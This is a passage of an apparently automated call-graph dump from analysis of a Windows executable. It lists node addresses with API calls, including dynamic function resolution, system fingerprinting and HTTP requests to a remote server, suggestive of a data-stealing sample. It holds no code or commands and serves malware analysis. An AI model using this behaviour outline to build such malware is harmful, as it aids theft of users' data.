45294->45295 45296 404610 34 API calls 45295->45296 45297 4034b0 45296->45297 45298 404610 34 API calls 45297->45298 45299 4034c9 45298->45299 45300 404610 34 API calls 45299->45300 45301 4034e2 45300->45301 45302 404610 34 API calls 45301->45302 45303 4034fb 45302->45303 45304 404610 34 API calls 45303->45304 45305 403514 45304->45305 45306 404610 34 API calls 45305->45306 45307 40352d 45306->45307 45308 404610 34 API calls 45307->45308 45309 403546 45308->45309 45310 404610 34 API calls 45309->45310 45311 40355f 45310->45311 45312 404610 34 API calls 45311->45312 45313 403578 45312->45313 45314 404610 34 API calls 45313->45314 45315 403591 45314->45315 45316 404610 34 API calls 45315->45316 45317 4035aa 45316->45317 45318 404610 34 API calls 45317->45318 45319 4035c3 45318->45319 45320 404610 34 API calls 45319->45320 45321 4035dc 45320->45321 45322 404610 34 API calls 45321->45322 45323 4035f5 45322->45323 45324 404610 34 API calls 45323->45324 45325 40360e 45324->45325 45326 404610 34 API calls 45325->45326 45327 403627 45326->45327 45328 404610 34 API calls 45327->45328 45329 403640 45328->45329 45330 404610 34 API calls 45329->45330 45331 403659 45330->45331 45332 404610 34 API calls 45331->45332 45333 403672 45332->45333 45334 404610 34 API calls 45333->45334 45335 40368b 45334->45335 45336 404610 34 API calls 45335->45336 45337 4036a4 45336->45337 45338 404610 34 API calls 45337->45338 45339 4036bd 45338->45339 45340 404610 34 API calls 45339->45340 45341 4036d6 45340->45341 45342 404610 34 API calls 45341->45342 45343 4036ef 45342->45343 45344 404610 34 API calls 45343->45344 45345 403708 45344->45345 45346 404610 34 API calls 45345->45346 45347 403721 45346->45347 45348 404610 34 API calls 45347->45348 45349 40373a 45348->45349 45350 404610 34 API calls 45349->45350 45351 403753 45350->45351 45352 404610 34 API calls 45351->45352 45353 40376c 45352->45353 45354 404610 34 API calls 45353->45354 45355 403785 45354->45355 45356 404610 34 API calls 45355->45356 45357 40379e 45356->45357 45358 404610 34 API calls 45357->45358 45359 4037b7 45358->45359 45360 404610 34 API calls 45359->45360 45361 4037d0 45360->45361 45362 404610 34 API calls 45361->45362 45363 4037e9 45362->45363 45364 404610 34 API calls 45363->45364 45365 403802 45364->45365 45366 404610 34 API calls 45365->45366 45367 40381b 45366->45367 45368 404610 34 API calls 45367->45368 45369 403834 45368->45369 45370 404610 34 API calls 45369->45370 45371 40384d 45370->45371 45372 404610 34 API calls 45371->45372 45373 403866 45372->45373 45374 404610 34 API calls 45373->45374 45375 40387f 45374->45375 45376 404610 34 API calls 45375->45376 45377 403898 45376->45377 45378 404610 34 API calls 45377->45378 45379 4038b1 45378->45379 45380 404610 34 API calls 45379->45380 45381 4038ca 45380->45381 45382 404610 34 API calls 45381->45382 45383 4038e3 45382->45383 45384 404610 34 API calls 45383->45384 45385 4038fc 45384->45385 45386 404610 34 API calls 45385->45386 45387 403915 45386->45387 45388 404610 34 API calls 45387->45388 45389 40392e 45388->45389 45390 404610 34 API calls 45389->45390 45391 403947 45390->45391 45392 404610 34 API calls 45391->45392 45393 403960 45392->45393 45394 404610 34 API calls 45393->45394 45395 403979 45394->45395 45396 404610 34 API calls 45395->45396 45397 403992 45396->45397 45398 404610 34 API calls 45397->45398 45399 4039ab 45398->45399 45400 404610 34 API calls 45399->45400 45401 4039c4 45400->45401 45402 404610 34 API calls 45401->45402 45403 4039dd 45402->45403 45404 404610 34 API calls 45403->45404 45405 4039f6 45404->45405 45406 404610 34 API calls 45405->45406 45407 403a0f 45406->45407 45408 404610 34 API calls 45407->45408 45409 403a28 45408->45409 45410 404610 34 API calls 45409->45410 45411 403a41 45410->45411 45412 404610 34 API calls 45411->45412 45413 403a5a 45412->45413 45414 404610 34 API calls 45413->45414 45415 403a73 45414->45415 45416 404610 34 API calls 45415->45416 45417 403a8c 45416->45417 45418 404610 34 API calls 45417->45418 45419 403aa5 45418->45419 45420 404610 34 API calls 45419->45420 45421 403abe 45420->45421 45422 404610 34 API calls 45421->45422 45423 403ad7 45422->45423 45424 404610 34 API calls 45423->45424 45425 403af0 45424->45425 45426 404610 34 API calls 45425->45426 45427 403b09 45426->45427 45428 404610 34 API calls 45427->45428 45429 403b22 45428->45429 45430 404610 34 API calls 45429->45430 45431 403b3b 45430->45431 45432 404610 34 API calls 45431->45432 45433 403b54 45432->45433 45434 404610 34 API calls 45433->45434 45435 403b6d 45434->45435 45436 404610 34 API calls 45435->45436 45437 403b86 45436->45437 45438 404610 34 API calls 45437->45438 45439 403b9f 45438->45439 45440 404610 34 API calls 45439->45440 45441 403bb8 45440->45441 45442 404610 34 API calls 45441->45442 45443 403bd1 45442->45443 45444 404610 34 API calls 45443->45444 45445 403bea 45444->45445 45446 404610 34 API calls 45445->45446 45447 403c03 45446->45447 45448 404610 34 API calls 45447->45448 45449 403c1c 45448->45449 45450 404610 34 API calls 45449->45450 45451 403c35 45450->45451 45452 404610 34 API calls 45451->45452 45453 403c4e 45452->45453 45454 404610 34 API calls 45453->45454 45455 403c67 45454->45455 45456 404610 34 API calls 45455->45456 45457 403c80 45456->45457 45458 404610 34 API calls 45457->45458 45459 403c99 45458->45459 45460 404610 34 API calls 45459->45460 45461 403cb2 45460->45461 45462 404610 34 API calls 45461->45462 45463 403ccb 45462->45463 45464 404610 34 API calls 45463->45464 45465 403ce4 45464->45465 45466 404610 34 API calls 45465->45466 45467 403cfd 45466->45467 45468 404610 34 API calls 45467->45468 45469 403d16 45468->45469 45470 404610 34 API calls 45469->45470 45471 403d2f 45470->45471 45472 404610 34 API calls 45471->45472 45473 403d48 45472->45473 45474 404610 34 API calls 45473->45474 45475 403d61 45474->45475 45476 404610 34 API calls 45475->45476 45477 403d7a 45476->45477 45478 404610 34 API calls 45477->45478 45479 403d93 45478->45479 45480 404610 34 API calls 45479->45480 45481 403dac 45480->45481 45482 404610 34 API calls 45481->45482 45483 403dc5 45482->45483 45484 404610 34 API calls 45483->45484 45485 403dde 45484->45485 45486 404610 34 API calls 45485->45486 45487 403df7 45486->45487 45488 404610 34 API calls 45487->45488 45489 403e10 45488->45489 45490 404610 34 API calls 45489->45490 45491 403e29 45490->45491 45492 404610 34 API calls 45491->45492 45493 403e42 45492->45493 45494 404610 34 API calls 45493->45494 45495 403e5b 45494->45495 45496 404610 34 API calls 45495->45496 45497 403e74 45496->45497 45498 404610 34 API calls 45497->45498 45499 403e8d 45498->45499 45500 404610 34 API calls 45499->45500 45501 403ea6 45500->45501 45502 404610 34 API calls 45501->45502 45503 403ebf 45502->45503 45504 404610 34 API calls 45503->45504 45505 403ed8 45504->45505 45506 404610 34 API calls 45505->45506 45507 403ef1 45506->45507 45508 404610 34 API calls 45507->45508 45509 403f0a 45508->45509 45510 404610 34 API calls 45509->45510 45511 403f23 45510->45511 45512 404610 34 API calls 45511->45512 45513 403f3c 45512->45513 45514 404610 34 API calls 45513->45514 45515 403f55 45514->45515 45516 404610 34 API calls 45515->45516 45517 403f6e 45516->45517 45518 404610 34 API calls 45517->45518 45519 403f87 45518->45519 45520 404610 34 API calls 45519->45520 45521 403fa0 45520->45521 45522 404610 34 API calls 45521->45522 45523 403fb9 45522->45523 45524 404610 34 API calls 45523->45524 45525 403fd2 45524->45525 45526 404610 34 API calls 45525->45526 45527 403feb 45526->45527 45528 404610 34 API calls 45527->45528 45529 404004 45528->45529 45530 404610 34 API calls 45529->45530 45531 40401d 45530->45531 45532 404610 34 API calls 45531->45532 45533 404036 45532->45533 45534 404610 34 API calls 45533->45534 45535 40404f 45534->45535 45536 404610 34 API calls 45535->45536 45537 404068 45536->45537 45538 404610 34 API calls 45537->45538 45539 404081 45538->45539 45540 404610 34 API calls 45539->45540 45541 40409a 45540->45541 45542 404610 34 API calls 45541->45542 45543 4040b3 45542->45543 45544 404610 34 API calls 45543->45544 45545 4040cc 45544->45545 45546 404610 34 API calls 45545->45546 45547 4040e5 45546->45547 45548 404610 34 API calls 45547->45548 45549 4040fe 45548->45549 45550 404610 34 API calls 45549->45550 45551 404117 45550->45551 45552 404610 34 API calls 45551->45552 45553 404130 45552->45553 45554 404610 34 API calls 45553->45554 45555 404149 45554->45555 45556 404610 34 API calls 45555->45556 45557 404162 45556->45557 45558 404610 34 API calls 45557->45558 45559 40417b 45558->45559 45560 404610 34 API calls 45559->45560 45561 404194 45560->45561 45562 404610 34 API calls 45561->45562 45563 4041ad 45562->45563 45564 404610 34 API calls 45563->45564 45565 4041c6 45564->45565 45566 404610 34 API calls 45565->45566 45567 4041df 45566->45567 45568 404610 34 API calls 45567->45568 45569 4041f8 45568->45569 45570 404610 34 API calls 45569->45570 45571 404211 45570->45571 45572 404610 34 API calls 45571->45572 45573 40422a 45572->45573 45574 404610 34 API calls 45573->45574 45575 404243 45574->45575 45576 404610 34 API calls 45575->45576 45577 40425c 45576->45577 45578 404610 34 API calls 45577->45578 45579 404275 45578->45579 45580 404610 34 API calls 45579->45580 45581 40428e 45580->45581 45582 404610 34 API calls 45581->45582 45583 4042a7 45582->45583 45584 404610 34 API calls 45583->45584 45585 4042c0 45584->45585 45586 404610 34 API calls 45585->45586 45587 4042d9 45586->45587 45588 404610 34 API calls 45587->45588 45589 4042f2 45588->45589 45590 404610 34 API calls 45589->45590 45591 40430b 45590->45591 45592 404610 34 API calls 45591->45592 45593 404324 45592->45593 45594 404610 34 API calls 45593->45594 45595 40433d 45594->45595 45596 404610 34 API calls 45595->45596 45597 404356 45596->45597 45598 404610 34 API calls 45597->45598 45599 40436f 45598->45599 45600 404610 34 API calls 45599->45600 45601 404388 45600->45601 45602 404610 34 API calls 45601->45602 45603 4043a1 45602->45603 45604 404610 34 API calls 45603->45604 45605 4043ba 45604->45605 45606 404610 34 API calls 45605->45606 45607 4043d3 45606->45607 45608 404610 34 API calls 45607->45608 45609 4043ec 45608->45609 45610 404610 34 API calls 45609->45610 45611 404405 45610->45611 45612 404610 34 API calls 45611->45612 45613 40441e 45612->45613 45614 404610 34 API calls 45613->45614 45615 404437 45614->45615 45616 404610 34 API calls 45615->45616 45617 404450 45616->45617 45618 404610 34 API calls 45617->45618 45619 404469 45618->45619 45620 404610 34 API calls 45619->45620 45621 404482 45620->45621 45622 404610 34 API calls 45621->45622 45623 40449b 45622->45623 45624 404610 34 API calls 45623->45624 45625 4044b4 45624->45625 45626 404610 34 API calls 45625->45626 45627 4044cd 45626->45627 45628 404610 34 API calls 45627->45628 45629 4044e6 45628->45629 45630 404610 34 API calls 45629->45630 45631 4044ff 45630->45631 45632 404610 34 API calls 45631->45632 45633 404518 45632->45633 45634 404610 34 API calls 45633->45634 45635 404531 45634->45635 45636 404610 34 API calls 45635->45636 45637 40454a 45636->45637 45638 404610 34 API calls 45637->45638 45639 404563 45638->45639 45640 404610 34 API calls 45639->45640 45641 40457c 45640->45641 45642 404610 34 API calls 45641->45642 45643 404595 45642->45643 45644 404610 34 API calls 45643->45644 45645 4045ae 45644->45645 45646 404610 34 API calls 45645->45646 45647 4045c7 45646->45647 45648 404610 34 API calls 45647->45648 45649 4045e0 45648->45649 45650 404610 34 API calls 45649->45650 45651 4045f9 45650->45651 45652 419f20 45651->45652 45653 419f30 43 API calls 45652->45653 45654 41a346 8 API calls 45652->45654 45653->45654 45655 41a456 45654->45655 45656 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45654->45656 45657 41a463 8 API calls 45655->45657 45658 41a526 45655->45658 45656->45655 45657->45658 45659 41a5a8 45658->45659 45660 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45658->45660 45661 41a5b5 6 API calls 45659->45661 45662 41a647 45659->45662 45660->45659 45661->45662 45663 41a654 9 API calls 45662->45663 45664 41a72f 45662->45664 45663->45664 45665 41a7b2 45664->45665 45666 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45664->45666 45667 41a7bb GetProcAddress GetProcAddress 45665->45667 45668 41a7ec 45665->45668 45666->45665 45667->45668 45669 41a825 45668->45669 45670 41a7f5 GetProcAddress GetProcAddress 45668->45670 45671 41a922 45669->45671 45672 41a832 10 API calls 45669->45672 45670->45669 45673 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45671->45673 45674 41a98d 45671->45674 45672->45671 45673->45674 45675 41a996 GetProcAddress 45674->45675 45676 41a9ae 45674->45676 45675->45676 45677 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45676->45677 45678 415ef3 45676->45678 45677->45678 45679 401590 45678->45679 46464 4016b0 45679->46464 45682 41aab0 lstrcpy 45683 4015b5 45682->45683 45684 41aab0 lstrcpy 45683->45684 45685 4015c7 45684->45685 45686 41aab0 lstrcpy 45685->45686 45687 4015d9 45686->45687 45688 41aab0 lstrcpy 45687->45688 45689 401663 45688->45689 45690 415760 45689->45690 45691 415771 45690->45691 45692 41ab30 2 API calls 45691->45692 45693 41577e 45692->45693 45694 41ab30 2 API calls 45693->45694 45695 41578b 45694->45695 45696 41ab30 2 API calls 45695->45696 45697 415798 45696->45697 45698 41aa50 lstrcpy 45697->45698 45699 4157a5 45698->45699 45700 41aa50 lstrcpy 45699->45700 45701 4157b2 45700->45701 45702 41aa50 lstrcpy 45701->45702 45703 4157bf 45702->45703 45704 41aa50 lstrcpy 45703->45704 45744 4157cc 45704->45744 45705 415440 23 API calls 45705->45744 45706 415893 StrCmpCA 45706->45744 45707 4158f0 StrCmpCA 45708 415a2c 45707->45708 45707->45744 45709 41abb0 lstrcpy 45708->45709 45710 415a38 45709->45710 45711 41ab30 2 API calls 45710->45711 45714 415a46 45711->45714 45712 41aa50 lstrcpy 45712->45744 45713 41ab30 lstrlenA lstrcpy 45713->45744 45716 41ab30 2 API calls 45714->45716 45715 415aa6 StrCmpCA 45717 415be1 45715->45717 45715->45744 45719 415a55 45716->45719 45718 41abb0 lstrcpy 45717->45718 45720 415bed 45718->45720 45721 4016b0 lstrcpy 45719->45721 45722 41ab30 2 API calls 45720->45722 45742 415a61 45721->45742 45723 415bfb 45722->45723 45725 41ab30 2 API calls 45723->45725 45724 415c5b StrCmpCA 45726 415c66 Sleep 45724->45726 45727 415c78 45724->45727 45729 415c0a 45725->45729 45726->45744 45730 41abb0 lstrcpy 45727->45730 45728 41aab0 lstrcpy 45728->45744 45731 4016b0 lstrcpy 45729->45731 45732 415c84 45730->45732 45731->45742 45734 41ab30 2 API calls 45732->45734 45733 401590 lstrcpy 45733->45744 45735 415c93 45734->45735 45737 41ab30 2 API calls 45735->45737 45736 415510 29 API calls 45736->45744 45738 415ca2 45737->45738 45740 4016b0 lstrcpy 45738->45740 45739 4159da StrCmpCA 45739->45744 45740->45742 45741 415b8f StrCmpCA 45741->45744 45742->44798 45743 41abb0 lstrcpy 45743->45744 45744->45705 45744->45706 45744->45707 45744->45712 45744->45713 45744->45715 45744->45724 45744->45728 45744->45733 45744->45736 45744->45739 45744->45741 45744->45743 45746 4176e3 GetVolumeInformationA 45745->45746 45747 4176dc 45745->45747 45748 417721 45746->45748 45747->45746 45749 41778c GetProcessHeap HeapAlloc 45748->45749 45750 4177a9 45749->45750 45751 4177b8 wsprintfA 45749->45751 45752 41aa50 lstrcpy 45750->45752 45753 41aa50 lstrcpy 45751->45753 45754 415ff7 45752->45754 45753->45754 45754->44819 45756 41aab0 lstrcpy 45755->45756 45757 4048e9 45756->45757 46473 404800 45757->46473 45759 4048f5 45760 41aa50 lstrcpy 45759->45760 45761 404927 45760->45761 45762 41aa50 lstrcpy 45761->45762 45763 404934 45762->45763 45764 41aa50 lstrcpy 45763->45764 45765 404941 45764->45765 45766 41aa50 lstrcpy 45765->45766 45767 40494e 45766->45767 45768 41aa50 lstrcpy 45767->45768 45769 40495b InternetOpenA StrCmpCA 45768->45769 45770 404994 45769->45770 45771 4049a5 45770->45771 45772 404f1b InternetCloseHandle 45770->45772 46486 418cf0 GetSystemTime lstrcpy lstrcpy 45771->46486 45774 404f38 45772->45774 46481 40a210 CryptStringToBinaryA 45774->46481 45775 4049b3 46487 41ac30 45775->46487 45778 4049c6 45780 41abb0 lstrcpy 45778->45780 45785 4049cf 45780->45785 45781 41ab30 2 API calls 45782 404f55 45781->45782 45784 41acc0 4 API calls 45782->45784 45783 404f77 ctype 45787 41aab0 lstrcpy 45783->45787 45786 404f6b 45784->45786 45789 41acc0 4 API calls 45785->45789 45788 41abb0 lstrcpy 45786->45788 45800 404fa7 45787->45800 45788->45783 45790 4049f9 45789->45790 45791 41abb0 lstrcpy 45790->45791 45792 404a02 45791->45792 45793 41acc0 4 API calls 45792->45793 45794 404a21 45793->45794 45795 41abb0 lstrcpy 45794->45795 45796 404a2a 45795->45796 45797 41ac30 3 API calls 45796->45797 45798 404a48 45797->45798 45799 41abb0 lstrcpy 45798->45799 45801 404a51 45799->45801 45800->44822 45802 41acc0 4 API calls 45801->45802 45803 404a70 45802->45803 45804 41abb0 lstrcpy 45803->45804 45805 404a79 45804->45805 45806 41acc0 4 API calls 45805->45806 45807 404a98 45806->45807 45808 41abb0 lstrcpy 45807->45808 45809 404aa1 45808->45809 45810 41acc0 4 API calls 45809->45810 45811 404acd 45810->45811 45812 41ac30 3 API calls 45811->45812 45813 404ad4 45812->45813 45814 41abb0 lstrcpy 45813->45814 45815 404add 45814->45815 45816 404af3 InternetConnectA 45815->45816 45816->45772 45817 404b23 HttpOpenRequestA 45816->45817 45819 404b78 45817->45819 45820 404f0e InternetCloseHandle 45817->45820 45821 41acc0 4 API calls 45819->45821 45820->45772 45822 404b8c 45821->45822 45823 41abb0 lstrcpy 45822->45823 45824 404b95 45823->45824 45825 41ac30 3 API calls 45824->45825 45826 404bb3 45825->45826 45827 41abb0 lstrcpy 45826->45827 45828 404bbc 45827->45828 45829 41acc0 4 API calls 45828->45829 45830 404bdb 45829->45830 45831 41abb0 lstrcpy 45830->45831 45832 404be4 45831->45832 45833 41acc0 4 API calls 45832->45833 45834 404c05 45833->45834 45835 41abb0 lstrcpy 45834->45835 45836 404c0e 45835->45836 45837 41acc0 4 API calls 45836->45837 45838 404c2e 45837->45838 45839 41abb0 lstrcpy 45838->45839 45840 404c37 45839->45840 45841 41acc0 4 API calls 45840->45841 45842 404c56 45841->45842 45843 41abb0 lstrcpy 45842->45843 45844 404c5f 45843->45844 45845 41ac30 3 API calls 45844->45845 45846 404c7d 45845->45846 45847 41abb0 lstrcpy 45846->45847 45848 404c86 45847->45848 45849 41acc0 4 API calls 45848->45849 45850 404ca5 45849->45850 45851 41abb0 lstrcpy 45850->45851 45852 404cae 45851->45852 45853 41acc0 4 API calls 45852->45853 45854 404ccd 45853->45854 45855 41abb0 lstrcpy 45854->45855 45856 404cd6 45855->45856 45857 41ac30 3 API calls 45856->45857 45858 404cf4 45857->45858 45859 41abb0 lstrcpy 45858->45859 45860 404cfd 45859->45860 45861 41acc0 4 API calls 45860->45861 45862 404d1c 45861->45862 45863 41abb0 lstrcpy 45862->45863 45864 404d25 45863->45864 45865 41acc0 4 API calls 45864->45865 45866 404d46 45865->45866 45867 41abb0 lstrcpy 45866->45867 45868 404d4f 45867->45868 45869 41acc0 4 API calls 45868->45869 45870 404d6f 45869->45870 45871 41abb0 lstrcpy 45870->45871 45872 404d78 45871->45872 45873 41acc0 4 API calls 45872->45873 45874 404d97 45873->45874 45875 41abb0 lstrcpy 45874->45875 45876 404da0 45875->45876 45877 41ac30 3 API calls 45876->45877 45878 404dbe 45877->45878 45879 41abb0 lstrcpy 45878->45879 45880 404dc7 45879->45880 45881 41aa50 lstrcpy 45880->45881 45882 404de2 45881->45882 45883 41ac30 3 API calls 45882->45883 45884 404e03 45883->45884 45885 41ac30 3 API calls 45884->45885 45886 404e0a 45885->45886 45887 41abb0 lstrcpy 45886->45887 45888 404e16 45887->45888 45889 404e37 lstrlenA 45888->45889 45890 404e4a 45889->45890 45891 404e53 lstrlenA 45890->45891 46493 41ade0 45891->46493 45893 404e63 HttpSendRequestA 45894 404e82 InternetReadFile 45893->45894 45895 404eb7 InternetCloseHandle 45894->45895 45900 404eae 45894->45900 45897 41ab10 45895->45897 45897->45820 45898 41acc0 4 API calls 45898->45900 45899 41abb0 lstrcpy 45899->45900 45900->45894 45900->45895 45900->45898 45900->45899 46498 41ade0 45901->46498 45903 411a14 StrCmpCA 45904 411a27 45903->45904 45905 411a1f ExitProcess 45903->45905 45906 411a37 strtok_s 45904->45906 45918 411a44 45906->45918 45907 411c12 45907->44824 45908 411bee strtok_s 45908->45918 45909 411b41 StrCmpCA 45909->45918 45910 411ba1 StrCmpCA 45910->45918 45911 411bc0 StrCmpCA 45911->45918 45912 411b63 StrCmpCA 45912->45918 45913 411b82 StrCmpCA 45913->45918 45914 411aad StrCmpCA 45914->45918 45915 411acf StrCmpCA 45915->45918 45916 411afd StrCmpCA 45916->45918 45917 411b1f StrCmpCA 45917->45918 45918->45907 45918->45908 45918->45909 45918->45910 45918->45911 45918->45912 45918->45913 45918->45914 45918->45915 45918->45916 45918->45917 45919 41ab30 lstrlenA lstrcpy 45918->45919 45920 41ab30 2 API calls 45918->45920 45919->45918 45920->45908 45922 41aab0 lstrcpy 45921->45922 45923 4059c9 45922->45923 45924 404800 5 API calls 45923->45924 45925 4059d5 45924->45925 45926 41aa50 lstrcpy 45925->45926 45927 405a0a 45926->45927 45928 41aa50 lstrcpy 45927->45928 45929 405a17 45928->45929 45930 41aa50 lstrcpy 45929->45930 45931 405a24 45930->45931 45932 41aa50 lstrcpy 45931->45932 45933 405a31 45932->45933 45934 41aa50 lstrcpy 45933->45934 45935 405a3e InternetOpenA StrCmpCA 45934->45935 45936 405a6d 45935->45936 45937 406013 InternetCloseHandle 45936->45937 45938 405a7e 45936->45938 45939 406030 45937->45939 46499 418cf0 GetSystemTime lstrcpy lstrcpy 45938->46499 45942 40a210 4 API calls 45939->45942 45941 405a8c 45943 41ac30 3 API calls 45941->45943 45944 406036 45942->45944 45945 405a9f 45943->45945 45947 41ab30 2 API calls 45944->45947 45951 40606f ctype 45944->45951 45946 41abb0 lstrcpy 45945->45946 45950 405aa8 45946->45950 45948 40604d 45947->45948 45949 41acc0 4 API calls 45948->45949 45952 406063 45949->45952 45955 41acc0 4 API calls 45950->45955 45954 41aab0 lstrcpy 45951->45954 45953 41abb0 lstrcpy 45952->45953 45953->45951 45964 40609f 45954->45964 45956 405ad2 45955->45956 45957 41abb0 lstrcpy 45956->45957 45958 405adb 45957->45958 45959 41acc0 4 API calls 45958->45959 45960 405afa 45959->45960 45961 41abb0 lstrcpy 45960->45961 45962 405b03 45961->45962 45963 41ac30 3 API calls 45962->45963 45965 405b21 45963->45965 45964->44830 45966 41abb0 lstrcpy 45965->45966 45967 405b2a 45966->45967 45968 41acc0 4 API calls 45967->45968 45969 405b49 45968->45969 45970 41abb0 lstrcpy 45969->45970 45971 405b52 45970->45971 45972 41acc0 4 API calls 45971->45972 45973 405b71 45972->45973 45974 41abb0 lstrcpy 45973->45974 45975 405b7a 45974->45975 45976 41acc0 4 API calls 45975->45976 45977 405ba6 45976->45977 45978 41ac30 3 API calls 45977->45978 45979 405bad 45978->45979 45980 41abb0 lstrcpy 45979->45980 45981 405bb6 45980->45981 45982 405bcc InternetConnectA 45981->45982 45982->45937 45983 405bfc HttpOpenRequestA 45982->45983 45985 406006 InternetCloseHandle 45983->45985 45986 405c5b 45983->45986 45985->45937 45987 41acc0 4 API calls 45986->45987 45988 405c6f 45987->45988 45989 41abb0 lstrcpy 45988->45989 45990 405c78 45989->45990 45991 41ac30 3 API calls 45990->45991 45992 405c96 45991->45992 45993 41abb0 lstrcpy 45992->45993 45994 405c9f 45993->45994 45995 41acc0 4 API calls 45994->45995 45996 405cbe 45995->45996 45997 41abb0 lstrcpy 45996->45997 45998 405cc7 45997->45998 45999 41acc0 4 API calls 45998->45999 46000 405ce8 45999->46000 46001 41abb0 lstrcpy 46000->46001 46002 405cf1 46001->46002 46003 41acc0 4 API calls 46002->46003 46004 405d11 46003->46004 46005 41abb0 lstrcpy 46004->46005 46006 405d1a 46005->46006 46007 41acc0 4 API calls 46006->46007 46008 405d39 46007->46008 46009 41abb0 lstrcpy 46008->46009 46010 405d42 46009->46010 46011 41ac30 3 API calls 46010->46011 46012 405d60 46011->46012 46013 41abb0 lstrcpy 46012->46013 46014 405d69 46013->46014 46015 41acc0 4 API calls 46014->46015 46016 405d88 46015->46016 46017 41abb0 lstrcpy 46016->46017 46018 405d91 46017->46018 46019 41acc0 4 API calls 46018->46019 46020 405db0 46019->46020 46021 41abb0 lstrcpy 46020->46021 46022 405db9 46021->46022 46023 41ac30 3 API calls 46022->46023 46024 405dd7 46023->46024 46025 41abb0 lstrcpy 46024->46025 46026 405de0 46025->46026 46027 41acc0 4 API calls 46026->46027 46028 405dff 46027->46028 46029 41abb0 lstrcpy 46028->46029 46030 405e08 46029->46030 46031 41acc0 4 API calls 46030->46031 46032 405e29 46031->46032 46033 41abb0 lstrcpy 46032->46033 46034 405e32 46033->46034 46035 41acc0 4 API calls 46034->46035 46036 405e52 46035->46036 46037 41abb0 lstrcpy 46036->46037 46038 405e5b 46037->46038 46039 41acc0 4 API calls 46038->46039 46040 405e7a 46039->46040 46041 41abb0 lstrcpy 46040->46041 46042 405e83 46041->46042 46043 41ac30 3 API calls 46042->46043 46044 405ea4 46043->46044 46045 41abb0 lstrcpy 46044->46045 46046 405ead 46045->46046 46047 405ec0 lstrlenA 46046->46047 46500 41ade0 46047->46500 46049 405ed1 lstrlenA GetProcessHeap HeapAlloc 46501 41ade0 46049->46501 46051 405efe lstrlenA 46502 41ade0 46051->46502 46053 405f0e memcpy 46503 41ade0 46053->46503 46055 405f27 lstrlenA 46056 405f37 46055->46056 46057 405f40 lstrlenA memcpy 46056->46057 46504 41ade0 46057->46504 46059 405f6a lstrlenA 46505 41ade0 46059->46505 46061 405f7a HttpSendRequestA 46062 405f85 InternetReadFile 46061->46062 46063 405fba InternetCloseHandle 46062->46063 46067 405fb1 46062->46067 46063->45985 46065 41acc0 4 API calls 46065->46067 46066 41abb0 lstrcpy 46066->46067 46067->46062 46067->46063 46067->46065 46067->46066 46506 41ade0 46068->46506 46070 4112a7 strtok_s 46072 4112b4 46070->46072 46071 41139f 46071->44832 46072->46071 46073 41137b strtok_s 46072->46073 46074 41ab30 lstrlenA lstrcpy 46072->46074 46073->46072 46074->46072 46507 41ade0 46075->46507 46077 410fe7 strtok_s 46084 410ff4 46077->46084 46078 411123 strtok_s 46078->46084 46079 4110d4 StrCmpCA 46079->46084 46080 411057 StrCmpCA 46080->46084 46081 411097 StrCmpCA 46081->46084 46082 411147 46082->44840 46083 41ab30 lstrlenA lstrcpy 46083->46084 46084->46078 46084->46079 46084->46080 46084->46081 46084->46082 46084->46083 46508 41ade0 46085->46508 46087 411197 strtok_s 46089 4111a4 46087->46089 46088 411274 46088->44848 46089->46088 46090 4111e2 StrCmpCA 46089->46090 46091 41ab30 lstrlenA lstrcpy 46089->46091 46092 411250 strtok_s 46089->46092 46090->46089 46091->46089 46092->46089 46094 41aa50 lstrcpy 46093->46094 46095 411c76 46094->46095 46096 41acc0 4 API calls 46095->46096 46097 411c87 46096->46097 46098 41abb0 lstrcpy 46097->46098 46099 411c90 46098->46099 46100 41acc0 4 API calls 46099->46100 46101 411cab 46100->46101 46102 41abb0 lstrcpy 46101->46102 46103 411cb4 46102->46103 46104 41acc0 4 API calls 46103->46104 46105 411ccd 46104->46105 46106 41abb0 lstrcpy 46105->46106 46107 411cd6 46106->46107 46108 41acc0 4 API calls 46107->46108 46109 411cf1 46108->46109 46110 41abb0 lstrcpy 46109->46110 46111 411cfa 46110->46111 46112 41acc0 4 API calls 46111->46112 46113 411d13 46112->46113 46114 41abb0 lstrcpy 46113->46114 46115 411d1c 46114->46115 46116 41acc0 4 API calls 46115->46116 46117 411d37 46116->46117 46118 41abb0 lstrcpy 46117->46118 46119 411d40 46118->46119 46120 41acc0 4 API calls 46119->46120 46121 411d59 46120->46121 46122 41abb0 lstrcpy 46121->46122 46123 411d62 46122->46123 46124 41acc0 4 API calls 46123->46124 46125 411d7d 46124->46125 46126 41abb0 lstrcpy 46125->46126 46127 411d86 46126->46127 46128 41acc0 4 API calls 46127->46128 46129 411d9f 46128->46129 46130 41abb0 lstrcpy 46129->46130 46131 411da8 46130->46131 46132 41acc0 4 API calls 46131->46132 46133 411dc6 46132->46133 46134 41abb0 lstrcpy 46133->46134 46135 411dcf 46134->46135 46136 417690 6 API calls 46135->46136 46137 411de6 46136->46137 46138 41ac30 3 API calls 46137->46138 46139 411df9 46138->46139 46140 41abb0 lstrcpy 46139->46140 46141 411e02 46140->46141 46142 41acc0 4 API calls 46141->46142 46143 411e2c 46142->46143 46144 41abb0 lstrcpy 46143->46144 46145 411e35 46144->46145 46146 41acc0 4 API calls 46145->46146 46147 411e55 46146->46147 46148 41abb0 lstrcpy 46147->46148 46149 411e5e 46148->46149 46509 417820 GetProcessHeap HeapAlloc 46149->46509 46152 41acc0 4 API calls 46153 411e7e 46152->46153 46154 41abb0 lstrcpy 46153->46154 46155 411e87 46154->46155 46156 41acc0 4 API calls 46155->46156 46157 411ea6 46156->46157 46158 41abb0 lstrcpy 46157->46158 46159 411eaf 46158->46159 46160 41acc0 4 API calls 46159->46160 46161 411ed0 46160->46161 46162 41abb0 lstrcpy 46161->46162 46163 411ed9 46162->46163 46516 417950 GetCurrentProcess IsWow64Process 46163->46516 46166 41acc0 4 API calls 46167 411ef9 46166->46167 46168 41abb0 lstrcpy 46167->46168 46169 411f02 46168->46169 46170 41acc0 4 API calls 46169->46170 46171 411f21 46170->46171 46172 41abb0 lstrcpy 46171->46172 46173 411f2a 46172->46173 46174 41acc0 4 API calls 46173->46174 46175 411f4b 46174->46175 46176 41abb0 lstrcpy 46175->46176 46177 411f54 46176->46177 46178 4179e0 3 API calls 46177->46178 46179 411f64 46178->46179 46180 41acc0 